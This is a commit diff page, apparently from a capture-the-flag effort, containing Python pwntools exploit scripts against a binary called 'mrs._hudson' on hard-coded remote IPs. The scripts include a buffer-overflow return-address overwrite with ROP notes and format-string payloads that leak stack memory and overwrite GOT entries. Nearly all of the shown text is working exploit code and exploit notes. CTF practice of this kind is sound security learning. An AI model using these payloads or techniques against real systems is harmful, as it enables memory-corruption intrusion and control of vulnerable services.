Commit 5760ea7d authored by Chris James's avatar Chris James

updated

parent 6e9aae31
0x00400680 == scanf
overwrite return address with 120 bytes (0x70 + 8)
rop chain:
0x004006f4 == ret
0x400500 == puts
need stack address
ret + 2qwords is stack addr
ret + 8qwords is stack addr
ret - 3qwords is stack addr
0x7ffdb6738de0
0x7ffdb6738e58
#!/usr/bin/env python2
from pwn import *
from IPython import embed
from binascii import hexlify,unhexlify
DEBUG=True
ips = ["146.185.168.172", "178.62.249.106"]
port = 54514
if DEBUG:
p = process("./mrs._hudson")
else:
p = remote(ips[0], port)
def log(message, sev=0):
msg = ""
if sev == 0:
......@@ -20,29 +27,15 @@ def log(message, sev=0):
msg += str(message)
print(msg)
def lengthTest(ip):
log("Length test on {}".format(ip))
maxLength = 2001
lengthStep = 100
log("maxLen: {}".format(maxLength))
log("lengthStep: {}".format(lengthStep))
for i in range(1, maxLength, lengthStep):
log("Connecting to: {}".format(ip), sev=1)
r = remote(ips[0], port)
log("number of bytes: {}".format(i))
log(r.readline())
log(r.send("\n"* i))
print(bytes(r.readline()))
r.close()
def main():
log("script starting")
lengthTest(ips[0])
raw_input()
p.sendline("A" * 0x78 + p64(0x4006f4))
embed()
p.close()
if __name__ == "__main__":
main()
#!/usr/bin/env python2
from pwn import *
from IPython import embed
ips = ["146.185.168.172", "178.62.249.106"]
port = 54514
def log(message, sev=0):
msg = ""
if sev == 0:
msg += "[INFO] - "
if sev == 1:
msg += "[WARN] - "
if sev == 2:
msg += "[CRIT] - "
else:
msg += "\t"
msg += str(message)
print(msg)
def lengthTest(ip):
log("Length test on {}".format(ip))
maxLength = 2001
lengthStep = 100
log("maxLen: {}".format(maxLength))
log("lengthStep: {}".format(lengthStep))
for i in range(1, maxLength, lengthStep):
log("Connecting to: {}".format(ip), sev=1)
r = remote(ips[0], port)
log("number of bytes: {}".format(i))
log(r.readline())
log(r.send("\n"* i))
print(bytes(r.readline()))
r.close()
def main():
log("script starting")
lengthTest(ips[0])
embed()
if __name__ == "__main__":
main()
......@@ -78,10 +78,10 @@ def patchBinary():
#p.sendline("%2$ln." + "%lx." * 20)
#p.sendline("%20$n.%1$x")
#target = 0x601018
#target = 0x601060
target = 0x600e10
#p.sendline("AA%59lx." + "BB%13$n." + "%1687lx." + "D%14$hn." + "EE%14$s." + p64(target + 2) + p64(target))
p.sendline("AA%20$s")
target = 0x601060
#target = 0x601020
p.sendline("AA%59lx." + "BB%13$n." + "%1687lx." + "D%14$hn." + "EE%14$s." + p64(target + 2) + p64(target))
#p.sendline("AA%20$s")
sleep(0.1)
output = p.read()
log(output)
......@@ -96,21 +96,39 @@ def patchBinary():
def leakStack():
words = []
#stackWords = [2, 5, 6, 9, 11, 12, 16, 20, 23, 25, 30]
#stackWords = [39, 40, 41, 45, 48, 51, 53, 54, 55, 56, 57, 58, 61]
#stackWords = [75, 91, 95]
stackWords = [9]
#stackWords = [2, 5, 6, 9, 11, 12, 16, 20, 23, 25, 30, 39, 40, 41, 45, 48, 51, 53, 54, 55, 56, 57, 58, 61, 75, 91, 95, 97]
#number 16?
#stackWords = [11]
#stackWords = [2, 5, 6, 9, 11, 12, 16, 20, 23]
#for i in range(1, 0x20):
for i in range(0xff):
#for i in range(128, 192):
for i in range(1):
#offsets = [8, 9, 10, 12, 13, ord('0'), ord('@'), ord('P'), 0xc9, 0xe2, 0xf9]
#offsets = [2]
#offsets = [97]
#for i in offsets:
#for i in stackWords:
try:
p = remote(ips[0], port)
except Exception as e:
return -1
log(p.readline())
#p.sendline("A%{}$lx.".format(str(i).zfill(2)))
#p.sendline("AA%{}$s.{}".format(str(i).zfill(2), chr(i)))
p.sendline("AAA%9$s.{}".format(chr(i)))
#p.sendline("%{}$lx.".format(str(i).zfill(3)))
#p.sendline("AA%{}$s.".format(str(i).zfill(2)))
#p.sendline("AAA%16$s." + "CCCC" * 13 + "BBB{}".format(chr(i)))
#p.sendline("AAA%16$s." + "CCCC" * 13 + "BBB\x0f")
#p.sendline("AA%16$lx." + ("A" * 55) + "{}".format(chr(i)))
#p.sendline("AA%11$s.{}".format(chr(i)))
#p.sendline("AA%10$lx")
#write 0x4006da in got @ 0x601020
#p.sendline("AA%59lx." + "B%13$lx." + "%1687lx." + "D%14$lx." + "E%15$lx." + p64(target + 2) + p64(target))
#p.sendline("AA%59lx." + "B%13$lx." + "%1687lx." + "D%14$lx." + "E%15$lx." + p64(0x601020))
p.sendline("AA%004lx" + "%13$hhn." + "%55808x." + "B%14$hn." + "CC%14$s." + p64(0x601021) + p64(0x601019))
#p.sendline("AA%59lx." + "BB%14$n." + "%1687lx." + "D%15$hn." + "EE%15$s." + "AA%16$n." + p64(target + 2) + p64(target) + '\x09')
#p.sendline("FF%699x." + "AAA%16$n." + "CCCC" * 11 + "BBB\x09")
sleep(0.1)
output = p.read()
log(output)
words.append(output)
......@@ -121,8 +139,8 @@ def main():
#dumpData()
#uncomment this for patching the binary/playing with basic format string primitive
#patchBinary()
leakStack()
patchBinary()
#leakStack()
if __name__ == "__main__":
......
This diff is collapsed.
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment